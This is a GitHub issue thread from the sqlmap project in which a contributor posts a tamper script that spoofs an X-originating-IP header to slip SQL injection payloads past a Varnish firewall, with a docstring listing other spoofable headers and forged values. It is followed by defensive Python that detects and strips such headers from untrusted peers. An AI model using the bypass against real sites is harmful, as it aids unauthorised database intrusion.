sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Tamper Script to WAF Protection of Varnish Firewall #760

Closed hansbonini closed 10 years ago

hansbonini commented 10 years ago

Tamper Script 0day - basic skeleton

#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import pprint

from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHER

def tamper(payload, **kwargs):
    """
    Append an HTTP request header to bypass
    WAF Protection of Varnish Firewall.

    You can tamper with different headers, like:
    >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
    >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
    >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
    >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
    >> X-remote-IP: * or %00 or %0A

        http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

    """

    singleTimeWarnMessage("Tampering WAF Protection of Varnish Firewall...")

    header = ("X-originating-IP", "127.0.0.1")
    # tamper() runs once per payload, so add the header only if it is missing
    if header not in conf.httpHeaders:
        conf.httpHeaders.append(header)
    pprint.pprint(conf.httpHeaders)  # debug output of the current header list
    return payload

stamparm commented 10 years ago

This will need to be adjusted, but the concept is OK ;)

stamparm commented 10 years ago

5

hansbonini commented 10 years ago

That's the idea... this is a basic concept. A good idea is to randomize the Varnish headers to do a more solid job.
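
Seen from the defending side, the script in this thread only works where the cache or WAF trusts origin headers supplied by the client. The following sketch is an added example, not part of the issue thread or of sqlmap: it flags and strips those headers on requests from untrusted peers. The trusted proxy range, the function names and the sample requests are assumptions.

```python
import ipaddress
from urllib.parse import unquote

# Header names from the tamper script's docstring, compared case-insensitively.
SPOOFABLE = {"x-forwarded-for", "x-remote-ip", "x-originating-ip", "x-remote-addr"}
# Assumption: only these peers (your own proxies) may set the headers above.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_trusted_peer(peer_ip):
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in TRUSTED_PROXIES)

def classify_value(value):
    """Return why a header value looks forged, or None if it is unremarkable."""
    decoded = unquote(value)
    if any(ord(ch) < 0x20 for ch in decoded):
        return "control-character"          # e.g. %00 or %0A
    for part in decoded.split(","):         # X-Forwarded-For may hold a list
        try:
            addr = ipaddress.ip_address(part.strip())
        except ValueError:
            return "not-an-ip"              # e.g. "*" or an empty value
        if addr.is_loopback:
            return "loopback"
        if any(addr in net for net in INTERNAL):
            return "internal-range"
    return None

def audit_request(peer_ip, headers):
    """List (header, reason) pairs for identity headers an untrusted peer should not send."""
    if is_trusted_peer(peer_ip):
        return []
    return [(name, reason) for name, value in headers
            if name.lower() in SPOOFABLE and (reason := classify_value(value))]

def strip_untrusted(peer_ip, headers):
    """Mitigation: drop client-supplied identity headers unless a trusted proxy sent them."""
    if is_trusted_peer(peer_ip):
        return list(headers)
    return [(n, v) for n, v in headers if n.lower() not in SPOOFABLE]

# Constructed sample requests: (TCP peer address, header list).
SAMPLE = [
    ("198.51.100.23", [("Host", "shop.example"), ("X-originating-IP", "127.0.0.1")]),
    ("198.51.100.24", [("X-remote-IP", "%0A")]),
    ("10.0.0.5", [("X-Forwarded-For", "192.168.1.7")]),  # request relayed by our own proxy
]
for peer, hdrs in SAMPLE:
    print(peer, audit_request(peer, hdrs), strip_untrusted(peer, hdrs))
```

The same rule belongs at the edge itself: the component that terminates client connections should discard or overwrite these headers before any allow-list decision reads them.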